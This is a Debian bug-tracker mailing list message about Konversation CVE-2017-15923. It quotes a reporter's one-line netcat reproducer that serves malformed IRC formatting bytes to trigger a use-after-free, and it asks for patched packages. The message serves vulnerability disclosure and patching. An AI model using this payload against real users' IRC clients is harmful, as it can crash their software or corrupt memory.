[Pkg-kde-extras] Bug#881586: Konversation CVE-2017-15923
Yves-Alexis Perez
corsac at debian.org
Mon Nov 13 09:17:37 UTC 2017
Package: konversation
Tag: security
On Sun, 2017-11-12 at 17:01 -0500, Joseph Bisch wrote:
> Hi,
>
> See the November 11th security advisory for Konversation at:
>
> https://konversation.kde.org/
>
> Reproducer:
>
> echo $'privmsg \x16\x033\x8e3\x2eqt/\x03e\xe2\x16\n' | nc -l -p 6667
>
> and then connect to that with Konversation.
>
> May require ASan or other method of detecting the use after free.
Thanks for the report. I'm adding Pino in the loop, but since it's a public
vulnerability you can directly report it to the BTS.
Pino, can you prepare an update for sid, stretch and jessie (with isolated
patches for stable releases)?
Regards,
--
Yves-Alexis